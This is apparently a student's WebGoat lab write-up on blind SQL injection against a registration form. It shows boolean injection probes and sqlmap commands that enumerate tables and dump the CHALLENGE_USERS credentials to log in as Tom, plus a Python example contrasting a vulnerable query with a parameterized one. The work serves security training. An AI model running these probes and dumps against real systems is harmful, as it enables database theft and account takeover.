Taskk 2

Uploaded by Ritik

Wireshark / WebGoat

Introduction: Learn about common web application vulnerabilities by analyzing a simple web
application. This task will help you understand how attackers can exploit weaknesses in web
applications.

As both the registration and the login worked fine with the new user, I can assume that both the
form values I sent over for these two operations were resulting in valid SQL queries.

So what happens if I try to send them again with an attached SQLi test?

newuser' AND '1'='1


From this response I understand that the app is checking whether the username already exists by running
the query we provided, so this statement is a valid TRUE statement, since the username already
exists.

newuser' and '1'='2


Hence this is a valid FALSE statement.

This is all we need in order to extract all of the database's data, as long as the DB user is allowed to read it.

In lesson #4 we were given a hint on this problem:

AND substring(database_version(),1,1) = '2

By varying the position argument of substring() and the literal value, we can loop through all
positions and see which character matches. Subsequent character positions of the database values
can be found with Burp Intruder by running a sniper attack on the §2§ payload position with a list such
as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and
checking which request returns a TRUE statement.
The database version is 2.5.0 on my WebGoat install.
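The TRUE/FALSE oracle above only exists because the registration check concatenates the form value into its SQL. The following is an added example, not WebGoat's own code: an in-memory SQLite stand-in for the lesson's user table (assumed schema, with the table name mirroring CHALLENGE_USERS from the lesson) with a hypothetical vulnerable lookup beside a parameterized one, showing that the two probes from this write-up flip the first check while the second treats them as an ordinary, non-existent username.

```python
import sqlite3


def make_db():
    # Constructed sample data: one existing account, as in the write-up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE challenge_users (userid TEXT, password TEXT)")
    conn.execute("INSERT INTO challenge_users VALUES ('newuser', 'changeme')")
    return conn


def username_exists_vulnerable(conn, username):
    # Hypothetical vulnerable check: the form value is spliced into the query
    # text, so a quote in the input ends the string literal and the rest of the
    # input becomes SQL logic that the database evaluates (the blind oracle).
    sql = "SELECT COUNT(*) FROM challenge_users WHERE userid = '" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def username_exists_safe(conn, username):
    # Hardened check: the value is bound as a parameter and compared as one
    # whole string, quotes and all, so no part of it is ever parsed as SQL.
    sql = "SELECT COUNT(*) FROM challenge_users WHERE userid = ?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


def probe(username):
    # Returns (vulnerable_result, safe_result) for one form value, so the two
    # behaviours can be compared side by side on the same database.
    conn = make_db()
    try:
        return (username_exists_vulnerable(conn, username),
                username_exists_safe(conn, username))
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ["newuser", "newuser' AND '1'='1", "newuser' and '1'='2"]:
        print(repr(value), "->", probe(value))
```

The vulnerable lookup answers TRUE and FALSE exactly as the lesson's registration form did, which is the signal a blind-SQLi tool works from; the parameterized lookup answers FALSE for both probes because no user with that literal name exists.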

I then wanted to automate with sqlmap and see what I could get from the db.

The simplest way I know to give sqlmap a proper request is to:

- submit the initial request and get the response for a TRUE statement from the browser

- copy them from Burp

- use the request as the input file and the response as the string parameter for the TRUE statement in
sqlmap

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1

current DB is PUBLIC + Boolean Blind SQL

Let's try to get the table names:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3

I would then start by looking at the CHALLENGE_USERS table:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3

sqlmap asking permission to brute force column names with its wordlist, and the result

And get the table rows; this time I have to lower the number of threads due to the number of errors I
was getting with 10 threads on my machine:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --dump --level=5 --risk=3

CHALLENGE_USERS table and Tom password

Now we have the username and password for Tom and can log in on the lesson's login form.
